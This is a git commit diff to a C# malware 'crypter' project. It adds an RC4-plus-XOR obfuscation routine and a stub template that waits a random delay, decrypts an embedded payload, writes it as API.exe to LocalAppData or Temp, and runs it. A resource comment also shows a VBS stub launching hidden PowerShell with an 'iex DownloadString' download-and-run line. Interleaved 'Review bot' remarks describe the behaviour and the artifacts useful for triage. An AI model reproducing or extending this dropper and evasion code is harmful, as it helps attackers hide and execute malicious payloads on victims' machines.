qwqdanchun 2020-05-18 21:16:02 +08:00
parent 5e369e0a2d
commit 71cd2f8f50
11 changed files with 18821 additions and 3 deletions


@ -53,7 +53,7 @@
<Reference Include="DotNetZip, Version=1.13.7.0, Culture=neutral, PublicKeyToken=6583c7c814667745, processorArchitecture=MSIL">
<HintPath>..\packages\DotNetZip.1.13.7\lib\net40\DotNetZip.dll</HintPath>
<EmbedInteropTypes>False</EmbedInteropTypes>
<Private>False</Private>
<Private>True</Private>
</Reference>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
@ -138,6 +138,7 @@
<Content Include="Resources\autoit_url.txt" />
<Content Include="Resources\imgcrypt.txt" />
<Content Include="Resources\CSharp_js_url.txt" />
<Content Include="Resources\rc4_xor.txt" />
<Content Include="Resources\VBS_img.txt" />
<Content Include="Resources\VBS_url.txt" />
<Content Include="Resources\VB.txt" />


@ -69,6 +69,7 @@
this.groupBox2 = new System.Windows.Forms.GroupBox();
this.button18 = new System.Windows.Forms.Button();
this.button17 = new System.Windows.Forms.Button();
this.button19 = new System.Windows.Forms.Button();
this.contextMenuStrip1.SuspendLayout();
this.menuStrip1.SuspendLayout();
this.groupBox1.SuspendLayout();
@ -415,7 +416,7 @@
this.groupBox2.Size = new System.Drawing.Size(126, 68);
this.groupBox2.TabIndex = 27;
this.groupBox2.TabStop = false;
this.groupBox2.Text = "groupBox2";
this.groupBox2.Text = "imgVBS";
//
// button18
//
@ -437,12 +438,23 @@
this.button17.UseVisualStyleBackColor = true;
this.button17.Click += new System.EventHandler(this.button17_Click);
//
// button19
//
this.button19.Location = new System.Drawing.Point(144, 308);
this.button19.Name = "button19";
this.button19.Size = new System.Drawing.Size(59, 38);
this.button19.TabIndex = 28;
this.button19.Text = "RC4\r\nXOR";
this.button19.UseVisualStyleBackColor = true;
this.button19.Click += new System.EventHandler(this.button19_Click);
//
// Form1
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.BackColor = System.Drawing.SystemColors.Control;
this.ClientSize = new System.Drawing.Size(751, 383);
this.Controls.Add(this.button19);
this.Controls.Add(this.groupBox2);
this.Controls.Add(this.button15);
this.Controls.Add(this.groupBox1);
@ -527,6 +539,7 @@
private System.Windows.Forms.GroupBox groupBox2;
private System.Windows.Forms.Button button18;
private System.Windows.Forms.Button button17;
private System.Windows.Forms.Button button19;
}
}


@ -11,6 +11,9 @@ using System.Diagnostics;
using Ionic.Zip;
using Crypter;
using System.Drawing;
using System.CodeDom.Compiler;
using Microsoft.CSharp;
using System.Collections.Generic;
namespace CrypterExample
{
@ -554,5 +557,98 @@ namespace CrypterExample
"Error!", MessageBoxButtons.OK, MessageBoxIcon.Information);
}
}
static string ByteArrayToString(byte[] ba)
{
return BitConverter.ToString(ba).Replace("-", "");
}
static byte[] RC4(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
static string XOR(string target)
{
string result = "";
for (int i = 0; i < target.Length; i++)
{
char ch = (char)(target[i] ^ 123);
result += ch;
}
//Console.WriteLine("XOR Encoded string: " + result);
return result;
}
public static string CompressString(string value)
{
byte[] byteArray = new byte[0];
if (!string.IsNullOrEmpty(value))
{
byteArray = Encoding.UTF8.GetBytes(value);
using (MemoryStream stream = new MemoryStream())
{
using (GZipStream zip = new GZipStream(stream, CompressionMode.Compress))
{
zip.Write(byteArray, 0, byteArray.Length);
}
byteArray = stream.ToArray();
}
}
return Convert.ToBase64String(byteArray);
}
private void button19_Click(object sender, EventArgs e)
{
if (textBox1.Text != "" && textBox3.Text != "")
{
string bytesString = ByteArrayToString(RC4(Encoding.Default.GetBytes(textBox3.Text), File.ReadAllBytes(textBox1.Text))); //Шифруем байты, конвертируем шифрованные байты файла в строку
string Source = Crypter.Properties.Resources.rc4_xor; // Переменная, в которой хранится код стаба
Source = Source.Replace("[BYTES]", CompressString(XOR(bytesString))); // Заменяем строку [BYTES], на заксоренную строку с шифрованными байтами
Source = Source.Replace("[PASSWORD]", CompressString(textBox3.Text)); // Заменяем пароль для RC4
textBox2.Text = Source;
MessageBox.Show("Copy to VS ; Use .NET Framework 4 ; Choose Windows Application.",
"Success!", MessageBoxButtons.OK, MessageBoxIcon.Information);
}
else
{
MessageBox.Show("Please select the file and enter the key.",
"Error!", MessageBoxButtons.OK, MessageBoxIcon.Information);
}
}
}
}
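Review bot: The new helpers and `button19_Click` have no English documentation, and the only comments (on the lines that fill the template) are in Russian, so a reader cannot tell from the code that none of these layers protects the payload. `XOR` uses the fixed key 123, `CompressString` is gzip plus Base64, and the RC4 password from `textBox3` is written into the generated source through the `[PASSWORD]` placeholder, so the input file can be recovered from the output alone. I would put `// Encoding only: fixed XOR key 123, and the RC4 password is embedded in the generated source next to the data.` above `XOR` and translate the inline comments to English. The three added `using` directives (`System.CodeDom.Compiler`, `Microsoft.CSharp`, `System.Collections.Generic`) are not referenced by any line shown in this section; the rest of the class lies outside the hunk, so that needs confirming.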


@ -404,6 +404,30 @@ namespace Crypter.Properties {
}
}
/// <summary>
/// 查找类似 using System;
///using System.Diagnostics;
///using System.IO;
///using System.Text;
///using System.Threading;
///using System.IO.Compression;
///using System.Reflection;
///
///namespace StubEch
///{
/// class Program
/// {
/// static void Main(string[] args)
/// {
/// Thread.Sleep(new Random(Environment.TickCount).Next(500, 5500)); // Делаем рандомную задержку перед запуском
/// byte[] encryptedBytes = StringToByteArray(XOR(DecompressString(&quot;[BYTES]&quot;))); // Сначала принимаем строку зашифрован [字符串的其余部分被截断]&quot;; 的本地化字符串。
/// </summary>
internal static string rc4_xor {
get {
return ResourceManager.GetString("rc4_xor", resourceCulture);
}
}
/// <summary>
/// 查找类似 Module ReFUD
/// Sub Main()
@ -428,7 +452,26 @@ namespace Crypter.Properties {
}
/// <summary>
/// 查找类似 的本地化字符串。
/// 查找类似 Dim Capony
///Dim WshProcEnv
///Dim process_architecture
///
///Set Capony = CreateObject(&quot;WScript.Shell&quot;)
///Set WshProcEnv = Capony.Environment(&quot;Process&quot;)
///
///process_architecture= WshProcEnv(&quot;PROCESSOR_ARCHITECTURE&quot;)
///
///If process_architecture = &quot;x86&quot; Then
/// attack(&quot;Powershell&quot;)
///Else
/// attack(&quot;C:\Windows\syswow64\Windowspowershell\v1.0\Powershell.exe&quot;)
///End If
///
///
///
///sub attack(S)
///
///Capony.Run S +&quot; -noexit -C $cry = new-object Net.WebClient;iex $cry.DownloadString(&apos;123456&apos;)&quot;, CONSOLE_HIDE, CMD [字符串的其余部分被截断]&quot;; 的本地化字符串。
/// </summary>
internal static string VBS_img {
get {


@ -163,6 +163,9 @@
<data name="rc4" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\rc4.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;utf-8</value>
</data>
<data name="rc4_xor" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\rc4_xor.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;utf-8</value>
</data>
<data name="VB" type="System.Resources.ResXFileRef, System.Windows.Forms">
<value>..\resources\vb.txt;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;gb2312</value>
</data>


@ -0,0 +1,126 @@
using System;
using System.Diagnostics;
using System.IO;
using System.Text;
using System.Threading;
using System.IO.Compression;
using System.Reflection;
namespace StubEch
{
class Program
{
static void Main(string[] args)
{
Thread.Sleep(new Random(Environment.TickCount).Next(500, 5500)); // Делаем рандомную задержку перед запуском
byte[] encryptedBytes = StringToByteArray(XOR(DecompressString("[BYTES]"))); // Сначала принимаем строку зашифрованных байтов (RC4 + XOR), декодируем XOR, в конце получаем зашифрованные байты.
byte[] passBytes = Encoding.Default.GetBytes(DecompressString("[PASSWORD]")); // Получаем байты пароля для RC4
byte[] decryptedBytes = RC4(passBytes, encryptedBytes); // Декодируем байты
DAR(decryptedBytes, "API.exe"); // Дропаем и запускаем чистый файл
}
static void DAR(byte[] bytes, string fileName) // В качестве аргументов принимаем байты и имя файла
{
string[] dirs = new string[] // Создаём массив папок, в один из которых будет дропаться файл
{
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), // LocalAppData
Path.GetTempPath() // Temp
};
Random random = new Random(); // Создаём переменную random, для генерации случайного числа
int pathIndex = random.Next(0, dirs.Length); // Определим индекс массива рандомно
string filePath = dirs[pathIndex] + "\\" + fileName; // Переменная, в которой хранится полный путь до файла
try
{
if (File.Exists(filePath)) // Делаем проверку на наличие файла в папке
{
File.Delete(filePath); // Если файл существует, то удаляем его
}
File.WriteAllBytes(filePath, bytes); // Записываем байты в файл
Process.Start(filePath); // Запускаем
}
catch { }
}
static byte[] StringToByteArray(string hex)
{
int NumberChars = hex.Length;
byte[] bytes = new byte[NumberChars / 2];
for (int i = 0; i < NumberChars; i += 2)
bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
return bytes;
}
static string XOR(string target)
{
string result = "";
for (int i = 0; i < target.Length; i++)
{
char ch = (char)(target[i] ^ 123);
result += ch;
}
//Console.WriteLine("XOR Encoded string: " + result);
return result;
}
public static string DecompressString(string str)
{
var value = Convert.FromBase64String(str);
string resultString = string.Empty;
if (value != null && value.Length > 0)
{
using (MemoryStream stream = new MemoryStream(value))
using (GZipStream zip = new GZipStream(stream, CompressionMode.Decompress))
using (StreamReader reader = new StreamReader(zip))
{
resultString = reader.ReadToEnd();
}
}
return resultString;
}
static byte[] RC4(byte[] pwd, byte[] data)
{
int a, i, j, k, tmp;
int[] key, box;
byte[] cipher;
key = new int[256];
box = new int[256];
cipher = new byte[data.Length];
for (i = 0; i < 256; i++)
{
key[i] = pwd[i % pwd.Length];
box[i] = i;
}
for (j = i = 0; i < 256; i++)
{
j = (j + box[i] + key[i]) % 256;
tmp = box[i];
box[i] = box[j];
box[j] = tmp;
}
for (a = j = i = 0; i < data.Length; i++)
{
a++;
a %= 256;
j += box[a];
j %= 256;
tmp = box[a];
box[a] = box[j];
box[j] = tmp;
k = box[((box[a] + box[j]) % 256)];
cipher[i] = (byte)(data[i] ^ k);
}
return cipher;
}
}
}
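Review bot: The template has no English header describing its run-time behaviour; the inline comments are Russian only and `DAR` is an unexplained name. A header comment should state what the visible code does: `Main` sleeps for a random 0.5–5.5 s, decodes the `[BYTES]` blob (Base64, gzip, XOR with 123, hex, then RC4 with the `[PASSWORD]` value), and `DAR` writes the result as `API.exe` under either `LocalApplicationData` or the temp path and starts it with `Process.Start`. The empty `catch { }` in `DAR` means a failed write or launch leaves no trace in the program itself, which belongs in the same comment. For anyone triaging a binary built from this template, the fixed file name, the two candidate directories and the write-then-start sequence are the stable artifacts to look for.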

Binary file not shown.

Binary file not shown.

Binary file not shown.

File diff suppressed because it is too large Load Diff